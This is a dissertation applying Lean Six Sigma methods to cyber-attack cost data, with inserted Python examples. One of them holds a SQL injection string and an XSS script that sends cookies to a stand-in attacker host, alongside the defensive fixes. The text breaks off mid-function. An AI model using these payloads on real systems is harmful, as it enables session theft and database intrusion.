
Utilization of the Lean Six Sigma Methodology to Cyber Security Threats

Info: 11268 words (45 pages) Dissertation
Published: 10th Dec 2019


Contents

Abstract

Acknowledgements

1. Introduction

1.1 Motivation

2. Literature Review

2.1 Lean manufacturing

2.1.1 Background

2.1.2 Lean Manufacturing Methodology

2.1.3 Plan, Do, Check, Act (PDCA)

2.1.4 Lean Thinking

2.2 Six Sigma

2.2.1 Background

2.2.2 Six Sigma Methodology

2.3 Lean Six Sigma

2.3.1 Background

2.3.2 Lean Six Sigma Methodology

3. Related work

3.1 ISO27k Standards

3.2 Lean Security Operations

3.3 Lean Security: How Better Development Can Protect Your Business

3.4 A Lean Approach to Information Security

3.5 Getting Lean on Security Operations

3.6 Simple Examples

3.6.1 Example 1

3.6.2 Example 2

3.6.3 Example 3

3.6.4 Example 4

4. DMAIC

4.1 Define

4.1.1 Definition of Security Threats

4.1.2 Applicable Tools

4.1.3 Project Charter

4.2 Measure

4.2.1 Measuring with the Ponemon Institute’s Data

4.3 Analyse

4.4 Improve

4.5 Control

5. Conclusions

6. References

Abstract

The purpose of this thesis is to investigate how the tools and techniques of the Lean Six Sigma methodology can be applied to various cyber security threats. The cyber threats investigated in this study are:

  • Web-based attacks
  • Denial of services
  • Phishing & Social Engineering
  • Malicious code
  • Malicious insiders
  • Malware
  • Viruses, worms, Trojans
  • Stolen devices
  • Botnets

Information on these attacks was acquired from the Ponemon Institute’s annual studies on the cost of cyber crime. The applicable information gathered from these studies was:

  • The average cost of cybercrime to companies per country, used to calculate the total annual cost of cyber crime for all countries
  • The cost percentage of individual attacks per country, used to calculate the total percentage for each type of attack
  • The types of attacks faced by companies over five years, used to calculate the 5 year average occurrences

These calculations were used to implement Lean Six Sigma tools such as the following:

  • Control chart – to help predict future cyber attacks and detect attack trends
  • XY matrix – to determine which tools are most and least effective at tackling the cyber security threats
  • FMEA – to prioritise and compare possible failures in the system that lead to an attack

A great number of other non-statistical tools and techniques were also applied to the cyber attacks, such as root cause analysis of the cyber attacks using fishbone diagrams and 5 Why analysis, or 5S and Poka-yoke, which are simple tools that can be used for eliminating and preventing errors in an organisation. Overall this study showed a good number of implementations of the Lean Six Sigma methodology on cyber security attacks.
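As an added example (not part of the dissertation), the control-chart calculation described above, worked through in Python: an individuals and moving-range (I-MR) chart whose centre line is the 5 year average number of attacks, with 3-sigma limits estimated from the average moving range. The yearly incident counts are constructed sample data, not figures from the Ponemon studies, and the trend rule (six consecutive rises or falls) is one of the standard run rules rather than anything the study specifies.

```python
"""Added example: an individuals and moving-range (I-MR) control chart over
yearly attack counts, the kind of control chart the abstract uses to spot
attack trends. The centre line is the plain average of the baseline years
(the '5 year average occurrences'); the 3-sigma limits are estimated from
the average moving range, as is standard for I-MR charts. All counts below
are constructed sample data, not figures from the Ponemon studies."""
from dataclasses import dataclass
from statistics import mean

# Standard SPC constant for individuals charts (3/d2 with d2 = 1.128 for a
# moving range of two points); not a figure taken from the dissertation.
E2 = 2.66

# Constructed baseline: successful phishing incidents recorded in each of
# five consecutive years at a hypothetical company.
BASELINE = [12, 15, 11, 14, 13]
# Constructed follow-up year to score against the baseline limits.
NEW_YEAR = [24]


@dataclass
class ChartLimits:
    centre: float   # centre line (mean of the baseline)
    ucl: float      # upper control limit
    lcl: float      # lower control limit, floored at zero for counts
    mr_bar: float   # average moving range used to estimate spread


def moving_ranges(values):
    """Absolute differences between consecutive observations."""
    return [abs(b - a) for a, b in zip(values, values[1:])]


def imr_limits(baseline):
    """Centre line and 3-sigma limits from a baseline period."""
    if len(baseline) < 2:
        raise ValueError("need at least two baseline observations")
    centre = mean(baseline)
    mr_bar = mean(moving_ranges(baseline))
    spread = E2 * mr_bar
    # An attack count cannot be negative, so the lower limit is floored at 0.
    return ChartLimits(centre, centre + spread, max(0.0, centre - spread), mr_bar)


def out_of_control(limits, observations):
    """(index, value, reason) for every point that falls outside the limits."""
    flags = []
    for i, x in enumerate(observations):
        if x > limits.ucl:
            flags.append((i, x, "above UCL"))
        elif x < limits.lcl:
            flags.append((i, x, "below LCL"))
    return flags


def has_trend(observations, length=6):
    """Run rule for a trend: `length` consecutive points all rising or all
    falling, which signals a shift even when every point stays inside the limits."""
    for start in range(len(observations) - length + 1):
        window = observations[start:start + length]
        steps = [b - a for a, b in zip(window, window[1:])]
        if all(s > 0 for s in steps) or all(s < 0 for s in steps):
            return True
    return False


if __name__ == "__main__":
    limits = imr_limits(BASELINE)
    print(f"centre={limits.centre:.2f} UCL={limits.ucl:.2f} LCL={limits.lcl:.2f}")
    print("out of control:", out_of_control(limits, BASELINE + NEW_YEAR))
    print("trend detected:", has_trend(BASELINE + NEW_YEAR))
```

With the constructed baseline the centre line is 13 incidents per year and the upper limit is about 20.3, so the follow-up year of 24 is flagged as out of control, which is the signal the abstract describes using to detect a change in attack rate; the limits should be recomputed from a fresh baseline once the process is known to have shifted.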

1. Introduction

In today’s world, the internet has become an integral part of everyday life for the majority of companies, governments and even regular members of the public. With advances in hardware and software technologies the internet now has extraordinary abilities; for example, from your fingertips it allows access to vast amounts of information while also staying connected to people all over the world.
Many companies have become dependent on the internet for the services it provides, such as global real-time communications and interconnectivity, IoT devices, online purchasing and sales, fast large-scale data processing, data transfer and data storage. While the internet has a vast number of benefits for companies, it also opens them up to the world of cybercrime. The cost of cybercrime for companies in 2015 was estimated to be over $500 billion; by 2019 that figure is predicted to quadruple to $2.1 trillion [1]. If a company is successfully attacked by a cyber criminal, not only is it affected by financial loss, but it may also be affected by losses of customer confidence, investor confidence, credibility and resources.

The Ponemon Institute (sponsored by HP Enterprise Security) annually carries out a global study that reports on the cost of cyber crime within companies in various industrial sectors. Their goal is to quantify the economic impact of cyber attacks and observe cost trends over time, so that companies can better understand the cost of cyber crime and invest in cyber security defences accordingly.

Their most recent global study, published in October 2016, involved 237 large companies (minimum 1000 employees) within six countries (United States, United Kingdom, Germany, Australia, Japan and Brazil). It found that companies on average annually spend $9.5 million tackling cybercrime, ranging from a low of $0.27 million to a high of $74 million; this figure rises to an average of $17.36 million for US companies. The cyber attacks that were most costly for the companies can be seen in descending order below.

Attack                           Percent of total spent
Web-based attacks                17%
Denial of services               16.3%
Phishing & Social Engineering    12.4%
Malicious code *                 12.3%
Malicious insiders               11.9%
Malware                          10%
Viruses, worms, Trojans          8.7%
Stolen devices                   7.9%
Botnets                          3.5%

* Malicious code is classified as malware attacks that successfully infiltrated the organisations’ networks or enterprise systems.

[2]

Companies these days are spending ever-increasing amounts of money on the latest defence systems to defend themselves from cyber threats. Yet even with the latest security defences most companies still continue to make headlines for falling victim to some sort of cyber crime, so much so that companies have now begun to expect that they will become victims of a cyber attack at some point. Thus, they prepare for the day they get attacked instead of relying solely on defence systems to keep them protected indefinitely.

Most attacks performed by cyber criminals have minor consequences for a company, although some attacks result in detrimental consequences for the victim company; for example, a major consequence of an intrusion by a cyber criminal into the company database may be the release of customers’ credit card information and/or other personal information. One of the most common reasons for companies falling victim to an intrusion is that the software they use has major security vulnerabilities. The software may have had a point of entry for cyber criminals to exploit right from the time it was developed, because security is rarely a priority for developers who would rather ship a product fast than spend time testing the product for potential risks. Cyber criminals are in many cases highly skilled programmers, who may spend endless hours data scraping or searching programs for undiscovered security holes and/or programming errors to gain access to a system. The vulnerabilities can usually be fixed with patches and updates, but sometimes not before the damage has already been done. Another of the most common reasons for companies falling victim to a cyber attack is human risk: employees may unknowingly grant hackers access to the company system, mainly for the following reasons:

  • Getting tricked into disclosing their passwords, or choosing weak passwords
  • Opening phishing emails
  • Clicking malicious links
  • Losing company devices or having them stolen

Hackers are increasingly targeting these human frailties because security defences have improved far faster than people have, and unfortunately people can’t be updated or patched.

1.1 Motivation

Having previously studied the Lean Six Sigma methodology for a number of years and achieved an honours degree in Industrial Engineering, I could see many uses for the Lean Six Sigma methodology in the cyber security sector. This influenced my decision to undertake a project of this type.

2. Literature Review

2.1 Lean manufacturing

2.1.1 Background

The majority of lean manufacturing methodologies were developed in Japan. Following World War II, the US sent consultants to provide aid and advice to the Japanese in a bid to help rebuild their manufacturing industry. When Toyota reviewed their manufacturing techniques, it occurred to them that a series of simple innovations within their process flow would provide better efficiency and continuity; this in turn led to the creation of the Toyota Production System (TPS). The TPS is a system that strives to continually improve standard processes and procedures in order to ensure maximum quality, improve efficiency and eliminate waste.[3]

Through implementation of the TPS it is estimated that the average profit for Toyota is 70% higher than the industry average in sales. These days many companies attempt to implement the TPS within their organisations, although few reach the same level of success as Toyota.[4]

The term lean was first used nearly 30 years ago in an article titled ‘Triumph of the Lean Production System’ by John Krafcik whilst working in the MIT International Motor Vehicle Program. In this article he wrote about the origin of Lean and described Lean production as being “lean” because it uses less of everything compared with ‘mass’ production: half the human effort in the factory, half the manufacturing space, half the investment in tools, and half the engineering hours to develop a new product in half the time. It also requires keeping far less than half the inventory on site, results in fewer defects and produces a greater and ever-growing variety of products.[5]

2.1.2 Lean Manufacturing Methodology

The basic idea of Lean manufacturing is to reduce waste and make continuous improvements within all operations and processes of the workflow, all whilst still meeting customer expectations.

In lean manufacturing, waste is seen as any task that does not add value to the product for the customer. Toyota identified 7 different types of waste:

  1. Transport
    Transport within the business is the physical movement of materials to different locations. This movement is an activity that adds no value to the customer’s product.
    Transport is usually a high cost within a company, due to the need for people and/or equipment to carry out the transportation. Streamlining the movement is usually implemented instead, for example using a conveyor-belt type device for transportation between processes.
  2. Inventory
    Inventory within a company is any piece of product tied up as either raw materials, work in progress or finished goods. All of these inventories cost the company money up until the item is sold and has physically left the building.
  3. Motion
    Wasted motion is any unnecessary movement made by either an operator or a machine that is not carried out as easily or efficiently as it could be, such as excessive travel between stations or excessive machine movements. These wasteful motions cost the company time and money and cause stress on the employees and machines.
  4. Waiting
    Waiting is a very common waste seen in most companies, whether it is an operator waiting for an operation to finish, for a supplier, or for the repair of a machine. These waiting wastes disrupt workflow and can be very costly to the company.
  5. Overproduction
    Many companies adopt a strategy of ‘just in case’ production, where inventory (finished goods, raw material or work in progress) is kept on hand to be sure the product will be in stock if needed. This strategy is normally used in case the product sells out, and for products that have long set-up times and/or long lead times. This waste hides underlying problems in the workflow and can be very costly to the company.
  6. Over-processing
    The over-processing waste is any process carried out on the product that is unnecessary and does not add value to the product for the customer. Each process should be assessed to determine whether or not it increases the value of the product, improves its functionality or makes it more appealing to the consumer. Over-processing can be seen in processes such as: over-polishing parts, sorting parts that don’t need to be sorted, heating parts for too long or at too high a temperature, excessive washing, redundant paperwork, excessive data collection, tumbling, turning or drying parts longer than necessary, and applying excess paint. It also includes the use of inappropriate techniques, oversized equipment, working to tolerances that are too tight, performing processes that are not required by the customer and so forth. All of these things cost time and money. One of the biggest examples of over-processing in most companies is that of the “mega machine” that can do an operation faster than any other, but every process flow has to be routed through it, causing scheduling complications, delays and so forth.
  7. Defects
    Defects are the most obvious of the seven wastes; a defect is when the product does not meet the customers’ specification or requirements. The main reasons for defects occurring can be: mistakes made during the original design, processes and procedures carried out on the product incorrectly, incorrect assembly, machine causes, or training. A defective product usually requires either rework or replacement; it wastes resources and materials, creates paperwork and can lead to lost customers.

Elimination of the seven wastes is accomplished through the implementation of a combination of lean tools, techniques, methods and principles.[6]

2.1.3 Plan, Do, Check, Act (PDCA)

The PDCA cycle is an essential part of lean manufacturing; it is an iterative methodology that applies a scientific approach to implementing continuous improvements. The steps in a PDCA cycle can be seen below.

  • Plan
    Generate a plan or hypothesis while also determining the expected results
  • Do
    Implement the plan or run an experiment
  • Check
    Evaluate the results and see if they achieved what was expected
  • Act
    Review, assess and refine; carry out again if required.[7]

2.1.4 Lean Thinking

Lean thinking is applying lean principles not just to the manufacturing process but to the entire company. It has been proven to result in major benefits to companies, with many companies reporting benefits such as producing the same level of product with half the workforce, reduced cycle times and higher quality products.[8]
According to the Lean Enterprise Institute (founded by Womack and Jones in 1997) there are five key principles in lean thinking, which are as follows:

  1. Value (in the eye of the customer)
    The focus when producing products, processes or methods is to design them in a way that will fulfil the customers’ needs.
  2. Value Streams
    When the value has been determined, all processes should be mapped with value streams. The stream should identify all the actions in the entire flow of the process from start to finish, to identify the steps that do not add value.
  3. Flow
    After the wastes have been determined, they should be eliminated. Ideally a one-piece flow is desired, although this is often not feasible; instead, every step the piece moves through should add value that meets the customers’ needs.
  4. Pull system
    Once an efficient flow system has been created, a pull production system for the product is designed, ideally one using the Just-in-Time (JIT) model, where the customer places the order and the product is manufactured only when the order has been placed.
  5. Perfection
    Continue the pursuit of perfection until all processes add 100% value and have zero waste.
    This may take some time, but with continuous incremental improvements a process may eventually reach perfection.[9]

In Lean Manufacturing the main focus is waste reduction; with Six Sigma the focus is also on waste reduction, but alongside process improvement and variation reduction.

2.2 Six Sigma

2.2.1 Background

Many of the Six Sigma methodologies can be traced as far back as Carl Friedrich Gauss (1777-1855), who introduced the concept of the normal curve. Next, in the 1920s, Walter Shewhart used Six Sigma to measure product variation. However, Six Sigma didn’t really come into existence until the mid-1980s, when Motorola decided that the conventional measurement of defects in thousands of opportunities didn’t provide enough granularity and instead wanted to measure defects per million opportunities.[10]

This journey started when Motorola engineer Bill Smith quietly began developing a methodology to standardize defect measurement and drive improvements in manufacturing. The quest to implement this new methodology led to the creation of tools to measure and compare the rate of quality improvement.
In the pursuit of a product or process having just 3.4 defects per million units or opportunities, the methodology continued to improve with the use of statistical tools and a step-by-step process to drive improvement, innovation and optimization.
Six Sigma soon became a collaborative effort between customers, suppliers and stakeholders, with other companies noticing the benefits and developing their own approach to follow suit, which led to the use of the Six Sigma methodology all over the world.[11]

2.2.2 Six Sigma Methodology

Six Sigma is ultimately a measure of quality that strives to achieve near perfection using a data-driven approach and methodology for eliminating defects (where a defect is defined as anything outside of customer specifications) in a process.[12]
The six sigma level of performance is for a process to produce no more than 3.4 defects per million opportunities (an opportunity is the total quantity of chances for a defect); expressed as a percentage, this means the process must be free of defects 99.99966% of the time. To achieve this high level of quality and efficiency the process uses a combination of tools and statistics.[13]
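As an added example (not from the dissertation), the figures above worked through in Python: defects per million opportunities (DPMO), the corresponding yield, and the sigma level recovered with the conventional 1.5 sigma shift, so that 3.4 DPMO comes back as 99.99966% yield and six sigma. The phishing-simulation counts in the example are constructed, and treating each delivered e-mail as one opportunity is an assumption made for the illustration.

```python
"""Added example: Six Sigma process metrics applied to a security process.
DPMO, yield and the sigma level are computed from defect counts; the sigma
level uses the conventional 1.5 sigma shift, which is what makes 3.4 DPMO
correspond to 'six sigma'. The phishing-simulation counts are constructed,
and treating each delivered e-mail as one opportunity is an assumption."""
from statistics import NormalDist

MILLION = 1_000_000
SIGMA_SHIFT = 1.5  # conventional long-term process shift used in sigma tables
_STD_NORMAL = NormalDist()  # mean 0, standard deviation 1


def dpmo(defects, units, opportunities_per_unit=1):
    """Defects per million opportunities."""
    total = units * opportunities_per_unit
    if total <= 0 or defects < 0 or defects > total:
        raise ValueError("defects must lie between 0 and the number of opportunities")
    return defects / total * MILLION


def yield_fraction(dpmo_value):
    """Fraction of opportunities that were defect-free."""
    return 1.0 - dpmo_value / MILLION


def sigma_level(dpmo_value, shift=SIGMA_SHIFT):
    """Sigma level: the z-score of the yield plus the conventional shift."""
    y = yield_fraction(dpmo_value)
    if not 0.0 < y < 1.0:
        raise ValueError("sigma level is undefined for 0% or 100% yield")
    return _STD_NORMAL.inv_cdf(y) + shift


def dpmo_for_sigma(level, shift=SIGMA_SHIFT):
    """Inverse of sigma_level: the DPMO a given sigma level allows."""
    tail = 1.0 - _STD_NORMAL.cdf(level - shift)
    return tail * MILLION


def phishing_example():
    """Constructed scenario: 10,000 simulated phishing e-mails delivered,
    50 clicked. Each click is a defect; each e-mail is one opportunity."""
    d = dpmo(defects=50, units=10_000)
    return {"dpmo": d, "yield": yield_fraction(d), "sigma": sigma_level(d)}


if __name__ == "__main__":
    print(f"3.4 DPMO -> yield {yield_fraction(3.4):.5%}, sigma {sigma_level(3.4):.2f}")
    print(f"six sigma allows {dpmo_for_sigma(6.0):.2f} DPMO")
    print(phishing_example())
```

The constructed phishing scenario comes out at roughly 4.1 sigma (0.5% of e-mails clicked), which gives a concrete sense of how far a typical security process sits from the 3.4 DPMO target; the same functions can be pointed at any count of security "defects" against a defined set of opportunities.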
When discussing the use of Six Sigma, the DMAIC methodology is usually the strategy used for the Six Sigma implementation.
DMAIC is a data-driven, project-based strategy that focuses on process improvement and variation reduction.[12]
This strategy is not exclusive to Six Sigma and can be implemented as a standalone tool, although it is usually employed as part of the Six Sigma quality initiative. The word DMAIC is an acronym for five interconnected phases: Define, Measure, Analyze, Improve, Control.[14]
Each phase of the DMAIC strategy is required for the best results to be achieved. Further details of the phases in the strategy can be seen below.

  • Define
    The goal of this phase is to define the details of the project, such as:

    • Who the customers are and what their expectations and requirements for this project entail.
    • The details of the project, such as what the boundaries are, the timelines and how the project work will flow.
    • What the purpose of performing this project is, what it hopes to achieve and what the overall project goals are.
  • Measure
    The goal of this phase is to measure the current process performance; this is carried out by:

    • Developing a data collection/measurement plan
    • Collecting data from all the inputs and outputs
    • Ensuring the measurement system is accurate
  • Analyze
    The goal of this phase is to analyse the measured data to determine the root causes and their relationship with the effects; this is carried out by using tools to:

    • Identify the gap between current and goal performance
    • Prioritize the potential opportunities to improve
    • Identify the sources of the causes
  • Improve
    The goal of this phase is to improve the current performance by developing techniques and solutions to eliminate and prevent the root causes; this is carried out by using tools to:

    • Develop innovative ideas
    • Focus on the easiest and most critical solutions
    • Develop and implement a detailed implementation plan
  • Control
    The goal of this phase is to control the improvements so that they do not revert back to the way they were; this is carried out by implementing tools and techniques to:

    • Ensure a permanent, reliable monitoring plan is kept going into the future, so that any deviations will be corrected immediately
    • Set strategies in place to prevent the causes from reoccurring
    • Establish and clearly define the improvements through modification of systems and structures, such as training and reward incentives.

The DMAIC strategy can in a way be seen as an application of a PDCA cycle; the difference is that DMAIC is more of a project-based approach, whereas PDCA has a wider application. Often both approaches are used concurrently on the same project: DMAIC analyses the root causes, while PDCA focuses on implementations within the project, which also helps discover causes.[15] [16]

2.3 Lean Six Sigma

2.3.1 Background

The use of Lean Six Sigma came about in the 1980s, when lean manufacturing and Six Sigma consultants were being trained in both methodologies and quickly realised the synergy between them: using a combination of tools from both lean and Six Sigma resulted in a greater number of problem-solving techniques, which ultimately led to greater savings and highly efficient processes for the companies.[17]

2.3.2 Lean Six Sigma Methodology

Lean Six Sigma is a combination of lean manufacturing and Six Sigma. It has been proven that they complement each other in a way that lean accelerates Six Sigma, producing greater results than would usually be seen by implementing them individually. Some of the results from the combination of both methodologies can be seen below:

  • Profit is increased for the company through streamlining processes, which results in products or services being completed faster and with greater efficiency.
  • Costs are reduced through eliminating wastes from processes and having a greater ability to solve problems.
  • Efficiency and effectiveness are improved, allowing for a greater number of products or services to be produced.
  • It helps develop the effectiveness of employees: involving employees in the improvement process builds trust and gives them a sense of ownership and accountability.[18]

3. Related work

There is not an extensive amount of research on Lean Six Sigma being implemented within the security area, and next to no research on Lean Six Sigma being applied directly to the real-world cyber security threats faced by companies today. The methodology is, however, frequently used in sectors other than manufacturing, with many of the tools and techniques increasingly being used successfully in business processes and even in software development.

Some examples of documented usage of Lean Six Sigma tools and techniques in the cyber security sector can be seen below:

3.1 ISO27k Standards

The “ISO27k” suite comprises about forty standards related to IT security techniques for information security management; for example, a standard may contain a set of guidelines for best security practices in a certain area of IT security. The suite of standards has security techniques applicable to a wide range of areas in IT security, ranging from ISO/IEC 27001 (Information security management systems — Requirements) to standards such as ISO 27799 (Health informatics — Information security management in health using ISO/IEC 27002).
The standard most related to this study is ISO/IEC 27001 Information security management systems — Requirements, usually referred to as ISO 27001. This is an international standard that came into effect on October 15, 2005, with the second edition coming into effect on October 01, 2013.[19]

It is a standard that provides a general framework to help protect company information such as financial data, intellectual property or sensitive customer information. It can help identify security risks whilst also putting security measures in place. It is designed in a way that ensures continuous reviewing and refining of the security risks and measures.[20]

It is used by most companies as a formal specification when creating the information security management system (ISMS) for use within their company.
The ISMS is a set of policies and procedures used to manage the security risks and requirements within a company. Companies are not legally obliged to implement ISO 27001; it instead provides suggestions for documentation, internal audits, continual improvement, and corrective and preventive actions. A company may comply with ISO 27001 and then become certified against it; thousands of companies have done so and in turn have been certified compliant with ISO 27001.[21]

The ISO/IEC standards recommend following the continuous improvement model of Plan-Do-Check-Act (PDCA) to maintain the ISMS within your company. ISO 27001 specifies a framework to follow to implement a PDCA cycle:

  • Plan: Design an ISMS workflow to assess threats and determine controls.
  • Do: Implement the plan.
  • Check: Review the implementation and evaluate its effectiveness.
  • Act: Make any needed changes to improve the effectiveness of your program.

The Six Sigma DMAIC approach is often used alongside the PDCA cycle to meet other requirements.[22]

3.2 Lean Security Operations

In a blog post written by Ray Bernard, he discusses the need for applying lean principles to security operations, in what he calls ‘Lean Security Operations’. He states that it involves two approaches:

  • The first is that the Lean Manufacturing principles need to be applied to security operations.
  • The second is to then use security technologies, such as security video cameras, to support lean operations outside of security.[23]

3.3 Lean Security: How Better Development Can Protect Your Business

In this article written by Andrew Storms, he discusses how Lean Security can protect your business. He explains how the lean security approach to information security is similar to the Toyota principles of management and production, calling for environmentally aware engineering, simplified coding, automation of security checks and constant incorporation of feedback.

He states “lean security doesn’t mean massive costs”; it instead uses process improvements and cultural changes rather than purchasing new tools, but to be successful it calls for engineers to keep the principles in mind throughout the development process.
He claims that when lean security is implemented correctly it results in a self-defending, simple system whose creators are people who are aware of the real-world security risks and have the company’s business goals in mind.

In the article Andrew gives some guidelines on how to implement lean security; these guidelines can be seen below:

  • Improve Environmental Awareness
    The lean security approach to risk management should be a team effort. Everyone should keep the issues of data privacy, software security and the business needs in mind throughout product development.
    When team members start to understand a product’s security risks, they start creating a more secure environment.
  • Simplify Engineering
    Reduce complexity not only in the coding, but also by reorganising the entire system in a way that improves the time to market and tightens feedback loops.
    Implement simple engineering while keeping teams compact and agile, since complex teams produce more lines of code that are constantly being reinvented, and the more code there is, the less secure it becomes.
  • Automate or Die
    Automation is an essential part of lean security: no team of engineers can manually discover and remedy the ever-increasing number of cyber threats, so automation is used to provide vigilance without the need for continued manpower.
  • Measure Everything
    Measurement should begin when identifying the goals you want to achieve.
    Measurements and metrics should be regularly reviewed and re-measured in pursuit of continuous improvement.[24]

3.4 A Lean Approach to Information Security

In this paper, Fred Scholl, PhD, CISSP, CISM, CHP (a security risk management consultant based in Nashville, Tennessee) looks at how and where security managers can apply lean concepts. The lean principles adapted to information security are as follows:

Voice of the Customer
This is the number one principle of lean thinking. As security takes place all across the IT department there are multiple customers of sorts, all of whom have security needs that must be met. These customers include users, executive managers, and the customers of the business itself. Before any security procedure is implemented it must be clear how it will contribute to satisfying the needs of these customers.

Continuous Improvement
Continuous improvement applies to the individual security processes, such as access management, and it also applies to the entire security program.

Proactive Behaviour
Taking proactive action when small-scale security events are detected helps prevent major incidents and outages.

Systems Thinking
With lean systems the focus is to build the best system possible without relying on sophisticated architectures; the system should be built through constant monitoring and improvements.

Constancy of Purpose
The security policy must be enforced with minimal exceptions in order to support the security program.

Respect for People
This principle implies that each employee and contractor has the ability to successfully do, and improve upon, the job for which they are held accountable.

Quality at the Source
Doing it right the first time applies to all security processes.

Flow, Pull, and Just in Time
This principle is applied to security processes such as access management and change management, where multiple steps can often result in delays or inaccuracies.

Culture
Any true security program must effect a cultural change within the organization to be fully effective.[24]

3.5 Getting Lean on Security Operations

In this article written by Derrick Wright CPP (security manager for Baxter Healthcare, Cherry Hill, N.J.), he explains what the first step in starting the lean process in a business is. It starts with performing a stakeholders exercise, which leads to answering two questions. Firstly you need to answer the question “Who depends on Security performing its functions?”; this leads to thinking about who the stakeholders are and what they value. Once the stakeholders have been established, you need to find out:

  • What security functions is the stakeholder dependent on, and why?
  • What are their expectations of Security?
  • How do they rate Security’s performance?

The next question you need to answer is: “Who has a role in the performance of security functions?” The answer will include security staff; management decision-makers senior to security; non-security personnel (employees, contractors and visitors); and heads of business units, divisions and departments.[25]

3.6 Simple Examples

Four simple examples of Lean Six Sigma in use for security operations can be seen below.

3.6.1 Example 1
In a New Jersey manufacturing plant they launched a Lean initiative, where the security manager introduced Lean principles to security operations by utilising manual process improvementand software to implement a self-service for items like parking permit, applications, area work permits, and changes to access privileges, these changes improved departmental productivity and reduced the time for employee transactions.[23]

3.6.2 Example 2
An Executive Vice President in California was able to eliminate a quarter-mile walk to a loading dock by using cameras to verify that critical shipments were ready to be shipped.[23]

3.6.3 Example 3
A health care provider used lean in its IT department to improve multiple processes; for example, the security function was used to drive improvements in the patch management process and to better document the business benefits of the improved processes.[24]

3.6.4 Example 4
An office furniture business used lean to implement an effective email spam filtering system, which resulted in significant cost savings and improved end-user satisfaction.[24]

4. DMAIC

This project is going to follow the data-driven, project-based DMAIC strategy to apply the Lean Six Sigma methodology to various cyber security threats.

4.1 Define

In the define phase we need to define what will be used in this DMAIC project. The problem being tackled needs to be clearly identified, and the reason why a project of this type is needed must be stated.

4.1.1 Definition of Security Threats

Below is a brief description of some of the most common cyber threats companies face.

Web-based attacks
A web-based attack is an attack that takes place within a web application. It is usually made possible by improper coding by the developer, due to a lack of tools or knowledge on how to build secure applications. The improper coding leads to weaknesses and vulnerabilities within the application that an attacker attempts to exploit.
The attacker usually targets vulnerabilities that will gain access to the company's back-end database. Once successful, the attacker has access to the valuable company and customer sensitive information stored (often unencrypted) within it.

The most commonly used web-based attacks can be seen below:

  • SQL injection
    In this type of attack, an attacker crafts a malicious Structured Query Language (SQL) fragment and enters it into, for example, a login form or search box on the company's website that is used to submit customer data to the back-end database. If the website has a SQL injection vulnerability, the input is concatenated into the SQL statement instead of being treated as data, so the attacker's fragment changes the meaning of the query and the database executes it. This can expose sensitive data such as usernames, passwords, credit card details, social security numbers, dates of birth, and mothers' maiden names, which can then be used for malicious purposes.
  • Cross-Site Scripting (XSS)
    XSS is another injection attack. It is typically used for cookie stealing, malware spreading, session hijacking, and malicious redirection. The attacker crafts a malicious script (usually JavaScript) and, if an XSS vulnerability is present on the company's trusted website, injects it into a web page that a typical user would load. That page becomes the launching point for the attacker's script, which executes in the user's browser when the page is loaded. For example, if the attacker injected a redirect script behind the login button on the company site, a user clicking the login button would expect the company's login screen but would instead be sent to a replica login screen under the attacker's control.[26]
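
The two flaws described above, as an added example that is not part of the original dissertation or of the cited Symantec article. The user table, the injection payload and the search-page snippet are constructed for the demonstration; the point is the difference between pasting user input into the SQL text (or the HTML) and handing it over as data (parameter placeholders, HTML encoding).

```python
import html
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the company's back-end
    database; the rows are made up for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, ssn TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "111-22-3333"),
         ("bob", "hunter2", "444-55-6666")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The flaw described above: form input is pasted straight into the SQL
    text, so input containing a quote can change the query's structure.
    Returns the matched rows; a non-empty result means 'logged in'."""
    query = ("SELECT username, ssn FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened form: placeholders hand the input to the driver as data, so
    quotes and comment markers in it can never alter the statement."""
    query = "SELECT username, ssn FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def render_results_vulnerable(term: str) -> str:
    """Reflected XSS: the search term is echoed into the page unencoded, so a
    term containing <script> runs in every visitor's browser."""
    return "<p>Results for: " + term + "</p>"


def render_results_safe(term: str) -> str:
    """Hardened form: HTML-encode untrusted text before placing it in markup."""
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


# Classic injection payload: closes the username literal, makes the WHERE
# clause always true, and comments out the password check.
INJECTION = "' OR 1=1 --"
# Constructed XSS payload that would ship the visitor's cookie to the attacker.
XSS_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable login rows:   ", login_vulnerable(db, INJECTION, "anything"))
    print("parameterised login rows:", login_parameterised(db, INJECTION, "anything"))
    print(render_results_vulnerable(XSS_PAYLOAD))
    print(render_results_safe(XSS_PAYLOAD))
```

Run as a script, the vulnerable login returns every row of the table for the injected username and no password at all, while the parameterised login returns nothing because the payload is compared literally against the stored usernames. The same split applies to the HTML: `html.escape` turns the angle brackets and quotes into entities, so the browser displays the payload instead of executing it.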

Denial of service (DoS)

In a DoS attack, the attacker's main goal is either to deny genuine users access to the company's web resources or to overwhelm the company's server so that it crashes. This is done by flooding the network or server with a large volume of worthless traffic. A DoS attack can be carried out from one computer using a single Internet connection, or, as a Distributed Denial of Service (DDoS) attack, from many computers in a botnet using many Internet connections.[27]
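
The single-source versus distributed distinction above is what a detector has to handle, and the added example below (not part of the original dissertation or the cited Cisco article) shows the minimal logic: a sliding-window request count per source and for all sources combined. The traffic records, the IP addresses and the two thresholds are constructed for the demonstration; real limits would be tuned from the site's normal request rate.

```python
from collections import Counter, defaultdict, deque


def peak_per_source(requests, window):
    """Highest number of requests any single source made within any sliding
    window of `window` seconds. `requests` is a list of (time, source_ip)
    sorted by time."""
    recent = defaultdict(deque)
    peak = Counter()
    for t, ip in requests:
        q = recent[ip]
        q.append(t)
        while q[0] <= t - window:        # drop requests that left the window
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return peak


def peak_total(requests, window):
    """Highest number of requests from all sources combined within any
    sliding window of `window` seconds."""
    q = deque()
    peak = 0
    for t, _ in requests:
        q.append(t)
        while q[0] <= t - window:
            q.popleft()
        peak = max(peak, len(q))
    return peak


def classify(requests, window=10, per_source_limit=100, total_limit=500):
    """Return (verdict, flooding_sources, peak_total_in_window). The two limits
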